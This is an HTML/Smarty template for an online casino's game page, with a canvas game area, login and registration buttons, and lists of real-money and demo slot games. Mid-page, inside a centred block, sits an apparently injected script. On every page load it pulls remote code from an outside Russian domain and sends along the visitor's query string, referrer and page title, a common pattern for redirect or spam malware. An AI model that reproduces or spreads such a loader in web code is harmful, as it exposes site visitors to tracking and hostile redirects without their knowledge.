<!DOCTYPE html>
<html>
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title>{$title}</title>
	<meta name="description" content="{$description} | {$lang['copyright']}" />
    <meta name="keywords" content="{$keywords}" />
	<link media="all" rel="stylesheet" href="{$theme_url}/css/styles.css" />
	<link media="all" rel="stylesheet" href="{$theme_url}/css/vendors/owl.carousel.css" />
	<link media="all" rel="stylesheet" href="{$theme_url}/css/vendors/jquery.fancybox.css" />
    <link media="all" rel="stylesheet" href="{$theme_url}/css/flagstrap/css/flags.css" />
  
    <!--[if IE]><link media="all" rel="stylesheet" href="{$theme_url}/css/styles_ie.css" /><![endif]-->
  
	<script type="text/javascript" src="{$theme_url}/js/jquery-1.11.0.min.js"></script>
	<script type="text/javascript" src="{$theme_url}/js/vendors/owl.carousel.min.js"></script>
	<script type="text/javascript" src="{$theme_url}/js/vendors/jquery.fancybox.pack.js"></script>
	<script type="text/javascript" src="{$theme_url}/js/jquery.main.js"></script>
    <script type="text/javascript" src="{$theme_url}/js/common.js"></script>
    <script type="text/javascript" src="{$theme_url}/js/cookies.js"></script>
	
	<!--[if lt IE 9]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

	
	<script src="jslib/init.js"></script>
	<script src="jslib/Game.js"></script>
	
</head>
<body class="game-page">

<center>

<style>
@font-face {
    font-family: "GothamProNarrowBold";
    src: url("fonts/GothamProNarrowBold.eot");
    src: url("fonts/GothamProNarrowBold.eot?#iefix")format("embedded-opentype"),
    url("fonts/GothamProNarrowBold.woff") format("woff"),
    url("fonts/GothamProNarrowBold.ttf") format("truetype");
    font-style: normal;
    font-weight: normal;
}
</style>

<script type="text/javascript">
var d=document;var s=d.createElement('script'); 
s.src='http://re-box.ru/5-0-1?frm=script&&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
</script>

</center>

{if !$user_id}
  {include file='dialogs.tpl'}
{/if}

	<div class="game">
		<div class="aside cell">
      {if $user_id}
			<a class="btn-orange" href="/out">{$lang['button_OUT']}</a><br/>
			<a class="btn-green" href="/enter">{$lang['button_PAY']}!</a>
      {else}
      <a class="btn-orange fancybox" href="#login">{$lang['button_ENTER']}</a><br/>
			<a class="btn-green fancybox" href="#choose_reg_bonus">{$lang['button_REGISTER']}</a>
      {/if}
			<div class="user-block">
				<img src="{$theme_url}/images/ava.png" width="48" height="48" alt=""/>
				<div class="texts">
					{$lang['block_gamers']} - {if $user_id} {$login} {else} {$lang['auth_guest']} {/if}
				</div>
			</div>
			<ul class="list">
        {for $i=0;$i<3;$i++}
        {$game=array_shift($game_block1)}
        <li>
					<img src="{$theme_url}/ico/{$game.g_name}.png" width="170" height="130" alt=""/>
					<div class="buttons">
						<a class="btn-green" href="/games/{$game.g_path}/{$game.g_name}/real">{$lang['button_REAL']}!</a>
						<a class="btn-orange small" href="/games/{$game.g_path}/{$game.g_name}/demo">{$lang['button_DEMO']}</a>
					</div>
		</li>
        {/for} 
			</ul>
		</div>
<script type="text/javascript">
	jQuery(window).load(function(){
		var block = jQuery('#game');
		var elem1 = jQuery('#mainCanvas');
		
		
		var blockHeight;

		function resizedw(){
			elem1.height(0);
			

			
			elem1.css({
				height: block.height(),width: block.width()
			})
			
		}

		resizedw();

		var doit;
		jQuery(window).on('resize orientationchange', function(){
			clearTimeout(doit);
			doit = setTimeout(resizedw, 100);
		})
	});
</script>
		<div class="game-holder cell" id="game">
<canvas id="mainCanvas"  width="1536" height="1024"></canvas>

		</div>
		<div class="aside cell">
			<ul class="list">
				{for $i=0;$i<4;$i++}
        {$game=array_shift($game_block2)}
        <li>
					<img src="{$theme_url}/ico/{$game.g_name}.png" width="170" height="130" alt=""/>
					<div class="buttons">
						<a class="btn-green" href="/games/{$game.g_path}/{$game.g_name}/real">{$lang['button_REAL']}!</a>
						<a class="btn-orange small" href="/games/{$game.g_path}/{$game.g_name}/demo">{$lang['button_DEMO']}</a>
					</div>
		</li>
        {/for}
			</ul>
		</div>
	</div>
</body>
</html>